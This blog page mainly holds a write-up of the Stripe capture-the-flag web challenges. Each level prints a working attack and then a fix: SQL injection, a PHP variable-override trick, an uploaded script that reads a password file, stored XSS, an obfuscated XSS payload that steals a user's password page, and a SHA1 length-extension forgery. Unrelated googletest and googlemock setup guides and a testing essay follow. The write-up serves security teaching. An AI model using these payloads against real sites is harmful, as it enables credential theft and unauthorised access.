        var secret_name = req.body['secret_name'];
        var secret_value = req.body['secret_value'];

        var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)';
        db.run(query, namespace, secret_name, secret_value, function(err) {
                if (err) throw err;
                res.header('Content-Type', 'text/html');
                res.redirect(req.path + '?namespace=' + namespace);
         });
});

The Hack

The code provided lists the following function:

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

When you request this page by performing a GET operation, the SQL query
SELECT * FROM secrets WHERE key LIKE ? || ".%"
is performed. The ? after LIKE in the query is the placeholder for the user-submitted namespace. Although the value is bound as data, the LIKE pattern characters within it are never escaped. The trick to overcoming this is to use the ‘%’ character – the SQL wildcard for pattern matching – as the namespace value, which effectively turns our statement into:
SELECT * FROM secrets WHERE key LIKE '%' || ".%"
This has the effect of telling the database to return all key pairs in the database – including the key to level 1.

One of the things to note is that the hack needs to be performed either from the text input box on the page, or from a tool such as cURL

The Fix

Never trust data from the client. This would’ve been fixed by limiting the type of data allowed to be submitted and sanitising it before execution.
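As a sketch of both the hole and the fix, here is an in-memory SQLite database mirroring the level’s secrets table (the row values are made up). The wildcard leaks everything until the bound value has its LIKE metacharacters escaped:

```python
import sqlite3

db = sqlite3.connect(':memory:')
db.execute('CREATE TABLE secrets (key TEXT, secret TEXT)')
db.executemany('INSERT INTO secrets VALUES (?, ?)',
               [('alice.pin', '1234'), ('bob.pin', '5678')])

# The namespace is bound safely as data, but LIKE pattern characters inside
# it are not escaped, so a namespace of '%' matches every key in the table.
leak = db.execute("SELECT * FROM secrets WHERE key LIKE ? || '.%'",
                  ('%',)).fetchall()
print(len(leak))   # 2 -- every secret in the table comes back

# Escaping the wildcard characters in the bound value closes the hole.
namespace = '%'.replace('%', r'\%').replace('_', r'\_')
safe = db.execute("SELECT * FROM secrets WHERE key LIKE ? || '.%' ESCAPE '\\'",
                  (namespace,)).fetchall()
print(len(safe))   # 0
```

The second query uses SQL's ESCAPE clause so that the attacker-supplied ‘%’ is matched literally, while the application's own ".%" suffix keeps working for genuine namespaces.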

Level 1

The Brief

We’re told that this machine is secure and we’ll have to try all possibilities but something is off with the code.

The Hack

The code is provided in the form of a PHP file which features the following snippet:

<?php
	$filename = 'secret-combination.txt';
	extract($_GET);
	if (isset($attempt)) {
		$combination = trim(file_get_contents($filename));
		if ($attempt === $combination) {
			echo "<p>How did you know the secret combination was" .
			     " $combination!?</p>";
			$next = file_get_contents('level02-password.txt');
			echo "<p>You've earned the password to access Level 2:" .
			     " $next</p>";
		} else {
			echo "<p>Incorrect! The secret combination is not $attempt</p>";
		}
	}
?>

What happens here is that the submitted password is tested against a value read in from $filename using the function file_get_contents, which reads the given file into a string; if the call is unsuccessful, it simply returns an empty string.

If we look at the extract() function, we can see it imports variables into the current symbol table, overriding any existing ones. Note the ordering: $filename is declared, then extract() is called, and only then is $filename used.

By combining these things, we can override the value $filename to a non-existent file to get a comparison between two empty strings. To use this we simply visit: https://level01-2.stripe-ctf.com/user-USERNAME/?attempt=&filename=

The Fix

Again, don’t trust data from users! Using extract into the current symbol table means your variables can be overwritten – especially on $_GET variables that can be submitted by users. For any web API, you should know what parameters are expected and to check for those explicitly.

A safer way to code this would have been:

<?php
$filename = 'secret-combination.txt';
if (isset($_GET['attempt'])) {
	$attempt = $_GET['attempt'];
	$combination = trim(file_get_contents($filename));
	if ($attempt === $combination) {
		echo "<p>How did you know the secret combination was" .
		     " $combination!?</p>";
		$next = file_get_contents('level02-password.txt');
		echo "<p>You've earned the password to access Level 2:" .
		     " $next</p>";
	} else {
		echo "<p>Incorrect! The secret combination is not $attempt</p>";
	}
}
?>

Level 2

The Brief

We’re given access to Stripe’s Social Network “which are all the rage” and told to fill in our profile picture and that there’s a file called password.txt that contains the password for level 3.

The Hack

Again, we’re provided with the source code that shows that we can upload an arbitrary file to the /uploads directory! Oh dear.
The hack here is to upload a simple PHP script, which we’ll call foo.php, that contains the following

<?php
	echo "Password is: " . file_get_contents("../password.txt");
?>

and then visit https://level02-4.stripe-ctf.com/user-USERNAME/uploads/foo.php to see the password for level 3. The ability to upload our own scripts is a useful one… and it is used later on to good effect!

The Fix

Check what gets uploaded by your users. You can discard any file types that aren’t acceptable as well as forbidding access to scripts in the uploads directory.
There are various examples of scripts that will perform some kind of sanity check on uploaded files. A simple search for php validate image upload will provide plenty of examples to use as a starting point.
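As a minimal first-line-of-defence sketch (the extension allow-list and function name are our own invention, not code from the level):

```python
import os

ALLOWED_EXTENSIONS = {'.png', '.jpg', '.jpeg', '.gif'}

def upload_allowed(filename):
    # Reject anything that is not a known image extension. This is only the
    # first half of the fix; the uploads directory should also be served
    # with script execution disabled.
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS

print(upload_allowed('avatar.png'))  # True
print(upload_allowed('foo.php'))     # False
```

A real implementation would also inspect the file contents (magic bytes), since an attacker can name a PHP script avatar.png.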

Level 3

The Brief

We’re told that the new storage mechanism uses a human login and that user ‘bob’ holds the password for level 3.

The Hack

This is another case of SQL injection. In this case the offending line is the query string

    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can see that we can tag some SQL of our own onto this query; in this case we want to make use of SQL’s UNION statement.

UNION allows you to combine two or more result sets from multiple tables together. We’re going to use this to turn the statement into the following (note that {0} is replaced with our injection string):

SELECT id, password_hash, salt FROM users WHERE username = 'NULL' UNION SELECT id, HASH_WE_KNOW, SALT_WE_KNOW FROM users WHERE username = 'bob' -- LIMIT 1"

Everything from NULL' up to and including the trailing -- is the string we are going to inject; the -- at the end is used to comment out the LIMIT 1 part of the query.

So we have the query string but we need to get our hash and salt so we can complete it. The sample above featured the line:


    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can simply use our python interpreter to do the hard work for us to generate the requisite hexdigest from a password of ‘xx’ and a salt of ‘x’ to keep things simple:

[nick@slimtop ~]$ python
Python 2.7.3 (default, Jul 24 2012, 10:05:39) 
[GCC 4.7.0 20120507 (Red Hat 4.7.0-5)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib
>>> print hashlib.sha256('xx' + 'x').hexdigest()
cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860

All that’s left is to enter the query string NULL' UNION SELECT id, 'cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860', 'x' FROM users WHERE username = 'bob' -- as the username and set our password to be ‘xx’ and in we go.

The Fix

This is a far more complex fix to implement, as one really has to think like a cracker. The key defence is to use parameterised queries rather than building SQL statements with string formatting; a good starting point is
The SQL Injection Prevention Cheat Sheet from the Open Web Application Security Project
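As an illustrative sketch (using Python's sqlite3 module and a made-up users row), binding the username as a parameter renders the walkthrough's UNION payload harmless:

```python
import sqlite3

# Made-up single-user table standing in for the level 3 database
db = sqlite3.connect(':memory:')
db.execute('CREATE TABLE users (id INTEGER, username TEXT, '
           'password_hash TEXT, salt TEXT)')
db.execute("INSERT INTO users VALUES (1, 'bob', 'realhash', 'realsalt')")

# The walkthrough's UNION payload, but bound as a parameter: the database
# treats the whole string as a (non-existent) username, not as SQL
payload = ("NULL' UNION SELECT id, 'knownhash', 'x' FROM users "
           "WHERE username = 'bob' -- ")
row = db.execute(
    'SELECT id, password_hash, salt FROM users WHERE username = ? LIMIT 1',
    (payload,)).fetchone()
print(row)  # None
```

Compare this with the vulnerable .format(username) call above: the placeholder keeps data and SQL strictly separate.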

Level 4

The Brief

We’re told about a piece of software called Karma Trader that allows people to reward others with karma for good deeds – the caveat being that

In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The Hack

The presence of the jQuery library is a good indicator that we’re going to be doing something untoward using it. The hack here is a very simple XSS exploit to make use of the fact that our password will be shown to people we transfer karma to. We simply set our password to be a piece of jQuery code that will use the jQuery.post() function to send some karma to our user naughty_man

So we create our account as naughty_man with the password of <script>$.post("transfer", {to: "naughty_man", amount: "50"} )</script> and send some karma to karma_trader.
When she next logs in, she will unknowingly execute our script which will send us some karma and her password for the next level.

The Fix

As before – the primary concept is not to trust any input that comes from the user. The input should be escaped or encoded when rendered so that it cannot execute as script. The Cross Site Scripting (XSS) Prevention Cheat Sheet from the Open Web Application Security Project provides a good starting point.
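A small illustration using Python's standard html module: once the stored password is escaped before rendering, the level 4 payload becomes inert text:

```python
import html

# The malicious 'password' payload from the level above
password = '<script>$.post("transfer", {to: "naughty_man", amount: "50"} )</script>'
escaped = html.escape(password)

# The angle brackets and quotes are now entity references, so the browser
# renders the payload as text instead of executing it
print(escaped)
```

Whatever templating system is in use, the escaping must happen at output time, for every user-controlled field.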

Level 5

The Brief

We’re told about a new type of federated identity system where you provide a username, password and pingback URL where a simple “AUTHENTICATED” or “DENIED” is posted to the pingback location.
We’re also informed that we will need to authenticate as a user of level 5 and that it can only make outbound requests to other stripe-ctf.com servers.

Interestingly, we’re told that someone forgot to firewall off the high ports from the Level 2 server.

The Hack

There are two parts to this hack: get authenticated at a lower level, and then use the pingback to gain authentication at level 5.
To accomplish the first part, we need to get a stripe-ctf.com server to provide us with an ‘AUTHENTICATED’ string. Fortunately for us, we still have access to level 2!

Looking at the code, we can see the regex that is used to authenticate:

	def authenticated?(body)
		body =~ /[^\w]AUTHENTICATED[^\w]*$/
	end

We simply upload a script, stripe_auth.php, to print that string out:

<?php
print " AUTHENTICATED \n"; /* Note the spaces either side are matched for! */
?>

We can then specify this location as our pingback URL to gain initial authentication at level 2 – http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php

The second part required a bit of lateral thinking – reading our logged in page we can see it says:

You are authenticated as hacker@level02-2.stripe-ctf.com

The word authenticated here is enough to say we’re authenticated as level 5! – To use it we just tell it to use itself by specifying a pingback URL of:
https://level05-1.stripe-ctf.com/user-USERNAME/?pingback=http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php

This provides us with the password for our next level!

The Fix

Once again – we should not trust any input provided by the user. If we are going to allow some kind of authentication server, then we need to be able to trust the remote server. Taking it on the word of a user is not good enough!

We should either have a hard coded list of servers that we trust, or implement some kind of trust mechanism – such as public key cryptography
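A hedged sketch of the hard-coded allow-list approach (the host names and helper are hypothetical, not from the level):

```python
from urllib.parse import urlparse

# Hypothetical allow-list: the fix is to enumerate the authentication
# servers we actually trust, rather than fetching whatever URL the user gives
TRUSTED_HOSTS = {'sso.example.com'}

def pingback_allowed(url):
    # Only pingback URLs pointing at explicitly trusted hosts are accepted
    return urlparse(url).hostname in TRUSTED_HOSTS

print(pingback_allowed('https://sso.example.com/check'))                  # True
print(pingback_allowed('http://level02-2.stripe-ctf.com/uploads/x.php'))  # False
```

This alone would have blocked the uploaded stripe_auth.php from ever being consulted.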

Also, the fatal flaw in the design was to include the keyword for authentication within the level 5 server output.

Level 6

The Brief

We’re told that after the catastrophe of level 4 the Karma Trader was shutdown but a new service, Streamer, was created. The security of this app has been beefed up and the password of the first user contains double quotes and apostrophes to complicate things… but that it’s also the password to level 7

The Hack

Looking through the source code for Streamer for these so-called precautions we come across the following lines of code:

   def self.safe_insert(table, key_values)
      key_values.each do |key, value|
        # Just in case people try to exfiltrate
        # level07-password-holder's password
        if value.kind_of?(String) &&
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end
      end

This forbids any insertion of values containing either an apostrophe ‘ or double quote ” – Very important!

To explore the site a bit more, we create an account and have a look at how the posts are stored and manipulated. In the HTML we see the following:

<script>
      var username = "naughty_man";
      var post_data = [{"time":"Fri Aug 24 19:54:42 +0000 2012","title":"Hello World","user":"level07-password-holder","id":null,"body":"Welcome to Streamer, the most streamlined way of sharing\nupdates with your friends!\n\nOne great feature of Streamer is that no password resets are needed. I, for\nexample, have a very complicated password (including apostrophes, quotes, you\nname it!). But I remember it by clicking my name on the right-hand side and\nseeing what my password is.\n\nNote also that Streamer can run entirely within your corporate firewall. My\nmachine, for example, can only talk directly to the Streamer server itself!"}];
      function escapeHTML(val) {
        return $('<div/>').text(val).html();
      }
      function addPost(item) {
        var new_element = '<tr><th>' + escapeHTML(item['user']) + '</th><td><h4>' +
            escapeHTML(item['title']) + '</h4>' + escapeHTML(item['body']) + '</td></tr>';
        $('#posts > tbody:last').prepend(new_element);
      }
      for (var i = 0; i < post_data.length; i++) {
        var item = post_data[i];
        addPost(item);
      }
</script>

So interestingly, we can see that the posts are stored in a way that can be maliciously escaped with an errant </script> tag – we can test it by posting </script><script>alert(0);</script> and checking that the alert window is visible after refreshing the browser window – success.

What we want to do is read in the contents of ‘user_info’ – which we can see holds the current user’s password – while making sure that we don’t use any single or double quote characters, as submitting these is not allowed. Quite the challenge.

Fortunately for us, we can use jQuery.get() to retrieve a page for us and we can also force the browser to then submit this page (or the last 180 characters of it) in the form provided without any user intervention – This type of attack is called a Cross Site Request Forgery.

What we will do is:

// Get the page 'user_info' into a string with the jQuery function
$.get('user_info', function(data){
	// Remove all of the string apart from the last 180 characters to keep it short
	data = data.substr(data.length - 180);
	// Replace any double quotes with the text <DOUBLE>
	data = data.replace('\"','<DOUBLE>');
	// Replace any single quotes with the text <SINGLE>
	data = data.replace('\'','<SINGLE>');
	// We know there's only one form so set its value to be our data
	document.forms[0].content.value = data;
	// 'click' submit on the first form of the document
	document.forms[0].submit();
});

One problem we have is that we typically need quotes to delimit strings in our JavaScript, and quotes are exactly what is forbidden. Fortunately, we can use a combination of JavaScript’s eval() function and String.fromCharCode to accomplish what we need.

String.fromCharCode() allows us to encode forbidden characters as numeric codes that eval() turns back into a string at runtime – such that alert('Hi') becomes alert(eval(String.fromCharCode(39, 72, 105, 39))).
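A small helper (our own, not part of the level) shows how such payload fragments can be generated, and reproduces the character codes that appear in the final payload for the string 'user_info':

```python
def from_char_code(s):
    # Build the JavaScript String.fromCharCode(...) call whose runtime value
    # is s, so forbidden characters never appear literally in the payload
    return 'String.fromCharCode(%s)' % ', '.join(str(ord(c)) for c in s)

print(from_char_code("'user_info'"))
# String.fromCharCode(39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39)
```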

So knowing this, we can create our script and then convert it to using eval/String.fromCharCode so that our naughty script goes from…

}];// </script><script>$.get('user_info', function(data){ data = data.substr(data.length - 180); data = data.replace('\"','<DOUBLE>'); data = data.replace('\'','<SINGLE>'); document.forms[0].content.value = data; document.forms[0].submit(); });</script>

to this.

}];// </script><script>$.get(eval(String.fromCharCode(39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39)), function(data){ data = data.substr(data.length - 180); data = data.replace(eval(String.fromCharCode(39, 92, 34, 39)),eval(String.fromCharCode(39, 60, 68, 79, 85, 66, 76, 69, 62, 39))); data = data.replace(eval(String.fromCharCode(39, 92, 39, 39)),eval(String.fromCharCode(39, 60, 83, 73, 78, 71, 76, 69, 62, 39))); document.forms[0].content.value = data; document.forms[0].submit(); });</script> 

Finally, we can insert this into the stream (preferably with JavaScript disabled unless you want to run it yourself!) and wait for the first user to log in and unwittingly execute our script and post their valuable credentials.

The Fix

By now, we should be totally paranoid about any input data! Be sure to strip, encode or filter user data – and reject it if it contains any HTML characters – replacing them with safe alternatives so that ‘<’ becomes &lt;. A read of the Secure-Programs-HOWTO is a good way to become aware of the ways that users can trick you into running bad code.

Level 7

The Brief

For level 7, we are introduced to an on-line waffle ordering system. There are two levels of waffles that can be ordered: standard waffles and ‘premium’ waffles. We only have access to the standard waffles, but we need to be able to place an order for a premium waffle to reveal the password for the next level.
We are provided with an API to the ordering system, along with our secret key and a page (/logs/<user_id>) where we can view any previous orders we may have placed.

The Hack

The API for the system attempts to be secure by using a message-signing system. An order has two parts: the parameters (count, user_id, latitude, longitude and waffle) and a signature, produced by hashing the parameter string with the SHA1 algorithm using our secret key. This gives a string such as:

count=1&lat=0&user_id=5&long=0&waffle=liege|sig:a2f7af47b2633dd00f94d204e03d2a3f9a012674

This means we can exploit a SHA padding attack (also known as a hash length-extension attack), which enables us to create a valid SHA1 signature without knowing the original secret.

The design of the system allows us to find the order log of any user simply by changing the user ID on the logs page. From this we can get an original order from a privileged user:

count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:5fe387f05d3b205b6d10108c8f31312c8fd56711

There are tools that can generate SHA padding:

We want to add the parameter waffle=liege to the parameters, and using the tools we get a new string of:

count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x028&waffle=liege|sig:c0b55677bf18c7b48a32f1f705667e11008b93b2

The Fix

There are two reasons we are able to use this hack: first, it is very simple to find the logs of other users – these should be protected; second, the input has not been sanitised correctly.
The code used is:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        params[key] = val
    return params

This allows the same key to be submitted twice, and the second time it will overwrite the value of the first.
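A Python 3 sketch of that behaviour (the level's own code is Python 2; urllib.unquote_plus has moved to urllib.parse in Python 3):

```python
from urllib.parse import unquote_plus

def parse_params(raw_params):
    # Same logic as the level 7 parser: a repeated key silently
    # overwrites the earlier (signed) value
    params = {}
    for pair in raw_params.split('&'):
        key, val = pair.split('=')
        params[unquote_plus(key)] = unquote_plus(val)
    return params

parsed = parse_params('count=10&user_id=1&waffle=eggo&waffle=liege')
print(parsed['waffle'])  # liege
```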

By changing the code to something like the following:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        if not key in params:
            params[key] = val
    return params

the second instance of ‘waffle’ would have been ignored.

Level 8

The Brief

For level 8 we had to crack a new password storing mechanism. To supposedly increase security, a password is split between four separate servers – so that even if one server were compromised, the password would still be secure. To check a password, a 12-digit value was submitted to the main server, which would simply return ‘success’ or ‘failure’.

The system also provided a webhook that would be called by the main server to return the result of the password attempt.

To make life more interesting, the password server had been firewalled so that it could only be reached from another stripe-ctf.com server. In addition, delays had been inserted to prevent timing attacks, so that the main server always returned the success or failure of a password in a consistent time.

The Hack

We knew from previous levels, that we could launch our attack from the compromised level 2 server – so that was one part of the challenge solved.

Looking at the design of the algorithm, it was fairly obvious that the fundamental flaw was that splitting the key into 4 chunks of 3 digits greatly reduced the search space from 10¹² combinations to the order of 10³ per chunk, which is feasible to attack by brute force.

The first attempt at cracking this involved finding the four servers by sweeping through the port numbers for a valid response and then attacking each of the chunk servers in turn. While this worked locally, it failed on the stripe servers as the chunk servers were firewalled and could not be reached from the level 2 server…

By going back to the logs, we finally noticed the second flaw in the system. The main server split the 12 digits into chunks and submitted the chunks to the chunk servers in turn. However, if any of the chunk servers returned a failure then, for efficiency, the main server stopped checking and returned the result to the server specified in the webhook. This turned out to be the key flaw in the system: the webhook could look at the successive client port numbers of the requests from the main server and work out how far through the chunks a guess had got. Client port numbers are assigned sequentially, so each call to a chunk server uses up a port number – the fewer port numbers used between webhook calls, the earlier the password failed.

Therefore it became possible to brute force the first chunk by looking for a port difference of 2, the second chunk for a port difference of 3 and for chunk 3 a port difference of 4.
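As a sketch of the webhook-side inference (the port numbers here are illustrative, and the helper is ours):

```python
def port_gap(prev_webhook_port, curr_webhook_port):
    # Client ports are assigned sequentially, so the source-port gap between
    # two successive webhook callbacks approximates how many outbound
    # connections the main server made for our guess. A gap of 2 means it
    # failed at the first chunk server; a gap of 3 means the first chunk was
    # correct and it failed at the second; and so on.
    return curr_webhook_port - prev_webhook_port

print(port_gap(51000, 51002))  # 2: wrong first chunk
print(port_gap(51002, 51005))  # 3: first chunk correct, second wrong
```

Watching for the gap to increase while cycling a chunk through 000–999 identifies the correct value for that chunk.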

The Fix

Aside from the flaw in the system that reduced the possible combinations to a point where it became feasible to brute force the attack – the main flaw that allowed the attack to succeed was the shortcut of not submitting all the chunks to all the servers each time.
While this may have seemed like a good idea for computational efficiency, it proved to be the weak link that could then be exploited.

Conclusion

Hopefully this has been a useful and insightful article on the many ways that web applications can be attacked – just today Google published an article about how difficult content hosting on the modern web has become and if those sorts of players are struggling with it then it’s a very serious issue indeed.

You should sign up for our mailing list to hear about our latest blog articles and exciting new course offerings and if you have insight or alternative solutions we’d love to hear about them in the comments.

Setting up googlemock with Visual C++ 2010 Express Edition

March 15th, 2012

Following on from my last post about setting up googletest to use with Visual Studio 2010 express edition, this post builds on that by showing how to build, setup and test the googlemock libraries.

If you have read the previous post, then the basic steps are very similar.

First, download the googlemock zip file and unzip it to a known location. As before, I suggest something easy, either C:\gmock-1.6.0, or as in my case C:\src\gmock-1.6.0. One useful fact is that all the gtest code is included as part of the gmock distribution. It can be found at \gmock-1.6.0\gtest.

Building the gmock libraries

It is the same process as building the gtest libraries. One important note is that

The gmock libraries contain all the gtest code as well.

Navigate to the directory \gmock-1.6.0\msvc\2010 and open the Visual C++ project gmock (gmock.sln). You will end up with three projects.

image

Go ahead and build these (F7) and ignore any warnings. Once successfully built, look in the directory \gmock-1.6.0\msvc\2010\gtest\Debug and you will find two library files

  • gmock.lib
  • gmock_main.lib

Test the GMock Library

As part of the standard build, two executables are created that allow a quick self-test of googlemock (gtest has the same, but I neglected to mention it in my previous post).

I recommend opening a command window and navigating to the directory \gmock-1.6.0\msvc\2010\Debug. There you will find the file gmock_test.exe; go ahead and execute it [NOTE: I had two (of the 830) tests fail, which I’m not sure why (yet) – to be investigated]

image
This indicates that (most of) gmock functions correctly.

Building a Base GMock Project

A gmock project is the same as a gtest project but with different project properties. Create a new Win32 Console Application project. Add a test fixture file to the project:

testFixture.cpp
#include "gtest/gtest.h"

TEST(setup_test_case, testWillPass)
{
    EXPECT_EQ(42, 42);
}

TEST(setup_test_case, testWillFail)
{
    EXPECT_EQ(42, 0);
}

and exclude the file containing the default main from the build.

Modify the project properties (Alt+F7) as follows:

  • Set gmock and gtest header include directories
    • C/C++ -> General -> Additional Include Directories
      • \gmock-1.6.0\include
      • \gmock-1.6.0\gtest\include
  • Add gmock libraries (instead of gtest libs)
    • Linker -> General -> Addition Library Directories
      • \gmock-1.6.0\msvc\2010\Debug
    • Linker -> Input -> Additional Dependencies
      • gmock.lib
      • gmock_main.lib
  • Modify Runtime Library:
    • C/C++ -> Code Generation -> Runtime Library
      • Multi-threaded Debug (/MTd).

Note here that we don’t have to include the gtest libraries as these are embedded in the gmock libraries. Build and run and we will see the familiar gtest output:
image

To test the gmock setup we need to create two classes:

  • The class to become the Unit-Under-Test (UUT)
  • An interface class that the UUT calls upon, which doesn’t have any implementation (or the implementation is target/hardware specific).

Interface Class

IWidget.h
class IWidget
{
public:
    virtual void On() = 0;
    virtual void Off() = 0;
};

Unit Under Test

WidgetController.h
class IWidget;

class WidgetController
{
public:
    WidgetController(IWidget& w);
    ~WidgetController(void);
    void exec();
private:
    IWidget& myWidget;
};
WidgetController.cpp
#include "WidgetController.h"
#include "IWidget.h"

WidgetController::WidgetController(IWidget& w) : myWidget(w)
{
    myWidget.Off();
}

WidgetController::~WidgetController()
{
    myWidget.Off();
}

void WidgetController::exec()
{
    myWidget.On();
}

Testing using the Mock framework

To test using the Mock we need to:

  1. Include the gmock header [line 3]
  2. Create a mock class derived from the interface class [lines 5-10]
  3. Create a test where the UUT calls on the interface of the mock object [lines 12-17]
  4. Set the mock object’s expectation [line 15]. The mock expectation is that the Off member function will be called twice, once during WidgetController construction and once during destruction.
Using the mock
  1. // testFixture.cpp
  2. #include "gtest/gtest.h"
  3. #include "gmock/gmock.h"
  4. #include "IWidget.h"
  5. class MockWidget : public IWidget
  6. {
  7. public:
  8.     MOCK_METHOD0(On, void());
  9.     MOCK_METHOD0(Off, void());
  10. };
  11. #include “WidgetController.h”
  12. TEST(TestWidgetController, testConstructor)
  13. {
  14.     MockWidget mw;
  15.     EXPECT_CALL(mw, Off()).Times(2);
  16.     WidgetController wc(mw);
  17. }

Build and run

image

You can see gmock in action by simply changing the expectation, e.g. [lines 4-5]

Failing Test
  1. TEST(TestWidgetController, testConstructor)
  2. {
  3.     MockWidget mw;
  4. //    EXPECT_CALL(mw, Off()).Times(2);
  5.     EXPECT_CALL(mw, Off());
  6.     WidgetController wc(mw);
  7. }

will result in the following failed test output:

image

Where next?

Once you have a working project, the documentation on the Googlemock site is excellent. Start with Googlemock for Dummies.

Setting up googletest with Visual C++ 2010 Express Edition

March 7th, 2012

So on an Embedded, Real-Time blog why am I taking about Visual C++ and googletest?

With the growth and acceptance of agile techniques, such as Test Driven Design (TDD), which is very well explained in James Grenning’s book Test Driven Development for Embedded C, we now have a set of tools and techniques that are:

  • Natural to use (as they use the native language)
  • Easy to use (to varying degrees)
  • Free

that allow the quality of embedded software to be significantly improved prior to target based testing.

However, it is important to note that TDD does not solve (or even address) many of the complications of developing and testing software for an embedded environment, but at the same time it should not be ignored.

So why Visual C++ express edition and googletest?

First, Visual C++ is not my first tool of choice; this selection came from working with a customer – it was their choice. That said, the express edition is free to use (I am assuming you will be using a professional cross-compiler for target development) and it has become one of the best standards-conforming C++ compilers around. Also, I am not claiming to be a Visual C++ expert, as I don’t develop software targeted at Windows.

googletest (gtest) is, in my experience to date, by far the easiest unit testing framework around for testing C++. For testing C I prefer Unity, which I’ll discuss in a later post. googletest is also supported by googlemock (gmock), which is an essential part of being able to use a unit testing framework for host testing of embedded software (my next post will look at setting up gmock). Finally, gtest was also part of the customer’s requirements.

As with many of these projects, all the information is out there, but what I hope to do is save you a little of the pain I went through getting the project setup and working.

I will assume you have Visual C++ 2010 express edition installed, if not go ahead and install it following the default Microsoft process.

Next, download the googletest zip file and unzip it to a known location. I suggest something easy, either C:\gtest-1.6.0, or as in my case C:\src\gtest-1.6.0.

Building the gtest libraries

This couldn’t be easier. Simply navigate to the directory \gtest-1.6.0\msvc and open the Visual C++ project gtest (gtest.sln).

image

You will be asked to convert the project from an older format to a newer one. Go ahead and do this. Finally you’ll end up with four projects:

image

Go ahead and build these (F7) and ignore any warnings. Once successfully built, look in the directory \gtest-1.6.0\msvc\gtest\Debug and you will find two library files

image

These are Debug-build libraries (the ‘d’ suffix in the library name indicates this). If you want Release-build libraries, change the build configuration to Release and rebuild; you will then find gtest.lib and gtest_main.lib in \gtest-1.6.0\msvc\gtest\Release. For the purposes here, however, I’m assuming we only need to work with Debug builds.

Building a Visual C++ gtest Project

The key steps to build a gtest project are:

  • Create a new project
  • Win32 Console Application
  • Add test fixture file
    • and remove default main
  • Configure project properties
    • Additional Include Directories
    • \gtest-1.6.0\include
  • Add gtest (debug) libraries
    • gtestd.lib
    • gtest_maind.lib
  • Modify Runtime Library:
    • Multi-threaded Debug (/MTd)
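With the project configured as above, a first test fixture file might look like the following sketch. The `Counter` class here is purely hypothetical, standing in for your own unit under test; because gtest_maind.lib is linked, no main() is required:

```cpp
#include "gtest/gtest.h"

// Hypothetical unit under test - substitute your own class.
class Counter {
public:
    Counter() : count_(0) {}
    void increment() { ++count_; }
    int value() const { return count_; }
private:
    int count_;
};

// A test fixture gives every test a freshly constructed Counter.
class CounterTest : public ::testing::Test {
protected:
    Counter counter;
};

TEST_F(CounterTest, StartsAtZero) {
    EXPECT_EQ(0, counter.value());
}

TEST_F(CounterTest, IncrementAddsOne) {
    counter.increment();
    EXPECT_EQ(1, counter.value());
}
```

The main() supplied by gtest_maind.lib discovers and runs all registered tests, which is why the default main generated by the Win32 Console Application wizard must be removed.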


    Effective Testing: The “Swiss Cheese” model

    December 20th, 2011

    Why do we test?

    Software development is a collaborative effort: you bring in input from customers, managers, developers and QA, and synthesise a result. You do this because mistakes in requirements or architecture are expensive, possibly leading to lost sales.

    When we develop products we want them to be successful. We want our customers to buy, enjoy, and recommend our products or services. In other words, we want to build quality products. In this case, quality means four inter-related things:

    • Compliance quality – can we demonstrate that the software fulfils its requirements?
    • Intrinsic quality – is the product robust, reliable, maintainable, etc.?
    • Customer-perceived quality – how does the customer react to our product on a sensory, emotional level?
    • Fitness for purpose – does our product fulfil the stakeholders’ needs?

    Which of these types of quality is most important to us depends a lot on our problem domain and the goals and driving forces of our business.

    We take considerable pains (but not enough in most cases – but that’s a different argument!) to analyse, design and implement our system to meet our quality goals. Unfortunately, engineers are not perfect. They are under increasing pressure to deliver more features, in less time, and as a consequence they do not have the luxury of time to learn the problem domain, or examine their solutions.

    Inevitably, then, engineers make mistakes. These mistakes appear as corruptions in the translation from a specification (what to do) to an implementation. An error can occur wherever we translate a specification into an implementation.

    clip_image002

    Figure 1 – Typical errors in embedded systems

     

    This raises an important question – how do you measure confidence in a product? That is, how do we know the quality of our product is good enough that we can release it for production?

    The simple answer is: we test.

    Or, perhaps more correctly: we perform validation and verification activities.

    A note on definitions

    For this article I will use the following meanings for validation and verification. I’m being explicit because every development group I’ve spoken to uses a different word (or combination of them!) to describe the same concepts.

    Verification

    Verification confirms some predicate about the system: the existence (or non-existence), state, or value of some element of the system’s behaviour or qualities. Put simply, verification asks questions that yield a yes/no answer.

    Validation

